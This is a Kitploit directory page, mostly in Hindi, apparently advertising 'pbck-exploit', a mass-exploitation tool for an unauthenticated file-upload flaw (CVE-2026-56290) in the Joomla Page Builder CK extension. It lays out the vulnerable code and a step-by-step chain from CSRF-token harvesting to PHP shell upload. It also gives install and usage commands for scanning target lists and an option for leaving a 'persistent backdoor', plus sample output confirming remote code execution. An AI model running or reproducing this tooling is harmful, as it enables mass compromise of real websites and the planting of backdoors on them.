Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
pbck-exploit — 📤 CVE-2026-56290 के लिए सामूहिक शोषण फ्रेमवर्क — Page Builder CK Joomla में बिना प्रमाणीकरण के फ़ाइल अपलोड से RCE | Kitploit
उपकरण/GitHubGitHub/shinthink/pbck-exploit
टोहीभेद्यता स्कैनरशोषण फ्रेमवर्कवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubshinthink/pbck-exploit

pbck-exploit

📤 CVE-2026-56290 के लिए सामूहिक शोषण फ्रेमवर्क — Page Builder CK Joomla में बिना प्रमाणीकरण के फ़ाइल अपलोड से RCE

रिपॉजिटरी देखें
3152 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PBCK-Exploit — CVE-2026-56290 Joomla Page Builder CK Exploit

Python CVE License

Discovery CSRF RCE Cleanup Live

Joomla Page Builder CK के लिए मास एक्सप्लॉइटेशन & सत्यापन फ्रेमवर्क

अनप्रमाणित मनमाना फ़ाइल अपलोड → रिमोट कोड निष्पादन



📑 विषय-सूची

  • भेद्यता अवलोकन
  • प्रभावित संस्करण
  • विशेषताएँ
  • स्थापना
  • उपयोग
  • अवधारणा का प्रमाण
  • तकनीकी गहन विश्लेषण
  • पहचान पद्धति
  • सुरक्षा & शमन
  • अस्वीकरण
  • संदर्भ

🔴 भेद्यता अवलोकन

CVE-2026-56290 Page Builder CK (com_pagebuilderck) में एक क्रिटिकल-गंभीरता वाली भेद्यता है, जो एक लोकप्रिय Joomla पेज बिल्डर एक्सटेंशन है। browse.ajaxAddPicture कंट्रोलर विधि उपयोगकर्ता-नियंत्रित गंतव्य पथ के साथ अनप्रमाणित फ़ाइल अपलोड स्वीकार करती है, जिससे हमलावर वेब-सुलभ निर्देशिकाओं में मनमानी PHP फ़ाइलें लिख सकते हैं।

मूल कारण

// browse.php controller — NO authentication check
function ajaxAddPicture() {
    $input = JFactory::getApplication()->input;
    $file  = $input->files->get('file', null);   // ← user-controlled file
    $path  = trim($input->get('path', ''));       // ← user-controlled path, only trim()!
    // ... uploads file to $path without validating the destination
}

path पैरामीटर पर केवल trim() सैनिटाइज़ेशन लागू होता है — न कोई व्हाइटलिस्ट, न डायरेक्टरी ट्रैवर्सल जाँच, न प्रमाणीकरण गेट। किसी भी Joomla पृष्ठ से सार्वजनिक रूप से सुलभ CSRF टोकन के साथ मिलकर, हमलावर किसी भी लिखने-योग्य निर्देशिका में PHP शेल दूरस्थ रूप से अपलोड कर सकते हैं।

प्रभाव

वेक्टरगंभीरताप्रभाव
अनप्रमाणित फ़ाइल अपलोड9.8 (क्रिटिकल)मनमाना PHP कोड निष्पादन
CSRF टोकन संग्रहण5.3 (मध्यम)अपलोड श्रृंखला को सक्षम करता है
सूचना प्रकटीकरण5.3 (मध्यम)एक्सटेंशन संस्करण फ़िंगरप्रिंटिंग

हमले की श्रृंखला

1. HIT Joomla homepage     →  harvest CSRF token (hex32 + value "1")
2. POST file upload         →  task=browse.ajaxAddPicture&{token}=1
3. PHP shell lands in       →  media/com_pagebuilderck/gfonts/shell.php
4. GET shell URL            →  code executes, RCE confirmed
5. POST f=@file to shell    →  upload additional tools
6. GET ?cleanup=1           →  shell self-destructs

🟠 प्रभावित संस्करण

Page Builder CK संस्करणस्थितिटिप्पणियाँ
3.1.1 और उससे नीचे🔴 असुरक्षितअनप्रमाणित अपलोड की पुष्टि
3.4.10 और उससे नीचे🔴 असुरक्षितविश्लेषण के अनुसार विस्तारित सीमा
3.5.10 और उससे नीचे🔴 असुरक्षितकुछ पैच किए गए वेरिएंट मौजूद हो सकते हैं
> 3.5.10🟢 संभवतः पैच किया गयाmanifest XML से सत्यापित करें

नोट: संस्करण का पता Joomla manifest फ़ाइल /administrator/manifests/files/com_pagebuilderck.xml से लगाया जाता है। यदि manifest सुलभ नहीं है, तो स्कैनर डिफ़ॉल्ट रूप से लक्ष्य को संभावित रूप से असुरक्षित मानता है।


✨ विशेषताएँ

🔍 टोह

  • Joomla पहचान — 2-चरणीय: HTML फ़िंगरप्रिंट + एडमिन पैनल जाँच
  • PBCK पहचान — प्रत्यक्ष पथ जाँच + HTML पैटर्न मिलान
  • संस्करण निष्कर्षण — Manifest XML पार्सिंग + HTML regex फ़ॉलबैक
  • CSRF टोकन संग्रहण — बहु-पृष्ठ टोकन निष्कर्षण (होम, लॉगिन, पंजीकरण, एडमिन)
  • एंडपॉइंट ब्रूट-फोर्सिंग — समय-बजट खोज के साथ 1000+ टास्क/पैराम/पथ संयोजन

💀 एक्सप्लॉइटेशन

  • 40+ एक्सटेंशन बायपास — केस जगलिंग, क्रमांकित वेरिएंट, डबल एक्सटेंशन, Windows ट्रिक्स
  • 20+ गंतव्य पथ — एक्सटेंशन निर्देशिकाएँ, Joomla लिखने-योग्य निर्देशिकाएँ, ट्रैवर्सल पथ
  • शेल सत्यापन — टोकन-आधारित पुष्टि कि PHP निष्पादित होता है
  • स्वचालित सफाई — सत्यापन के बाद शेल स्वयं-नष्ट हो जाते हैं (?cleanup=1)
  • लाइव TXT आउटपुट — फ़ाइल में लिखे गए रीयल-टाइम थ्रेड-सुरक्षित परिणाम
  • JSON रिपोर्ट — प्रति-लक्ष्य पूर्ण विवरण सहित संरचित रिपोर्ट

📦 स्थापना

# Clone the repository
git clone https://github.com/shinthink/pbck-exploit.git
cd pbck-exploit

# Install dependencies
pip install -r requirements.txt

# Verify
python cve_2026_56290.py --help

आवश्यकताएँ

requests>=2.28.0
urllib3>=1.26.0

📖 उपयोग

कमांड लाइन तर्क

CVE-2026-56290 — PageBuilderCK Unauthenticated RCE | Mass Exploit & Validator

  -t, --target        Single target URL
  -f, --file          File with target URLs (one per line, # for comments)
  -o, --output        Live TXT output file (default: cve-2026-56290_live.txt)
  --json              JSON report file path (default: cve-2026-56290_report.json)
  --threads           Concurrent workers (default: 20)
  --timeout           Request timeout in seconds (default: 15)
  --no-cleanup        Leave shells on target (persistent backdoor)
  -v, --verbose       Verbose endpoint discovery output
  --known-endpoint    Skip discovery: task,file_param,folder_param

मूल उपयोग

# Single target
python cve_2026_56290.py -t https://target.com

# Mass scan from file
python cve_2026_56290.py -f targets.txt

# Custom output + verbose
python cve_2026_56290.py -f targets.txt -o results.txt -v

# Leave shells behind (persistent backdoor)
python cve_2026_56290.py -t https://target.com --no-cleanup

# Skip discovery with known endpoint
python cve_2026_56290.py -t https://target.com --known-endpoint "browse.ajaxAddPicture,file,path"

लक्ष्य फ़ाइल प्रारूप

# targets.txt
target-one.com
https://target-two.com/subdir
192.168.10.100
# comments and blank lines are ignored

🧪 अवधारणा का प्रमाण

परिदृश्य 1: लाइव आउटपुट के साथ मास स्कैन

$ python cve_2026_56290.py -f targets.txt -o live_results.txt
────────────────────────────────────────────────────────────
  CVE-2026-56290 | 5 targets | 20 threads | cleanup=yes
  Live TXT: live_results.txt
  2026-07-04 15:30:00
────────────────────────────────────────────────────────────

  ✅ https://target-vuln.com  [rce_confirmed]  12.4s
     PBCK: 3.4.7 [VULN]
     RCE  : ext=php | path=media/com_pagebuilderck/gfonts/
     Shell: https://target-vuln.com/media/com_pagebuilderck/gfonts/pbck_a3f2b9c1.php
     Usage: POST f=@file | ?cleanup=1
     EP   : task=browse.ajaxAddPicture | file=file | folder=path

  🛡️ https://target-patched.com  [patched]  3.2s
टूल डाउनलोड करें